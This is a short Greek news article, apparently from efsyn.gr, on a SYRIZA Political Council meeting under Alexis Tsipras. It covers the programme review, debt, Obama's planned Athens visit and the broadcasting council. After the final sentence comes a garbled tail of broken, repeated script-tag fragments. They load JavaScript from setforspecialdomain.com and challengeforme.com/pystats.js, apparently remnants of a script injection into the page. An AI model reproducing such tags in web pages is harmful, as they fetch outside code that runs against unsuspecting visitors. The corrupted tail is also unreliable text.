ΣΥΡΙΖΑ: Όλα στην ατζέντα του πολιτικού συμβουλίου

http://www.efsyn.gr/sites/efsyn.gr/files/field/image/3-siriza-630_2.jpg

Το σύνολο των σημαντικών εξελίξεων (αξιολόγηση του ελληνικού προγράμματος, δημόσιο χρέος, επίσκεψη του Μπαράκ Ομπάμα στην Αθήνα και επιχείρηση συγκρότησης του ΕΣΡ) τέθηκαν στο επίκεντρο της συνεδρίασης του Πολιτικού Συμβουλίου του ΣΥΡΙΖΑ, υπό τον πρωθυπουργό Αλέξη Τσίπρα.

Σύμφωνα με πληροφορίες από την Κουμουνδούρου, κατά τη διάρκεια της συνεδρίασης έγινε συζήτηση για την αξιολόγηση και τις τελευταίες εξελίξεις στη διαπραγμάτευση. Επιπλέον συζήτηση πραγματοποιήθηκε και για το θέμα του χρέους. Αυτό και σε συνάρτηση με την επικείμενη επίσκεψη του Προέδρου των ΗΠΑ Μπαράκ Ομπάμα στην Αθήνα την ερχόμενη εβδομάδα, και τον αντίκτυπο που έχει στις ευρύτερες εξελίξεις. Από τη συνεδρίαση απουσίαζε ο υπουργός Οικονομικών Ευκλείδης Τσακαλώτος, λόγω των υποχρεώσεών του στις Βρυξέλλες.

Επίσης, στο τραπέζι τέθηκε και το θέμα του Εθνικού Συμβουλίου Ραδιοτηλεόρασης. Σύμφωνα με τις ίδιες πηγές, η κυβέρνηση αναμένεται να εξαντλήσει κάθε περιθώριο για συναίνεση, τόσο με τη Νέα Δημοκρατία όσο και με τα άλλα κόμματα της αντιπολίτευσης, με στόχο να συγκροτηθεί το ΕΣΡ. Επίσης, η κυβέρνηση φέρεται να παρακολουθεί με ενδιαφέρον τις εξελίξεις στο συγκεκριμένο ζήτημα, με τις ίδιες πηγές να κάνουν λόγο για διαμόρφωση ενός κλίματος συναίνεσης, το οποίο αποτυπώθηκε και στην ψηφοφορία της τελευταίας συνεδρίασης της Διάσκεψης των Προέδρων της Βουλής.

Σημειώνεται πως για πρώτη φορά συνυπήρξαν στον ίδιο χώρο ο πρωθυπουργός με τον Νίκο Φίλη, μετά την απομάκρυνση του δεύτερου από το υπουργείο Παιδείας.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >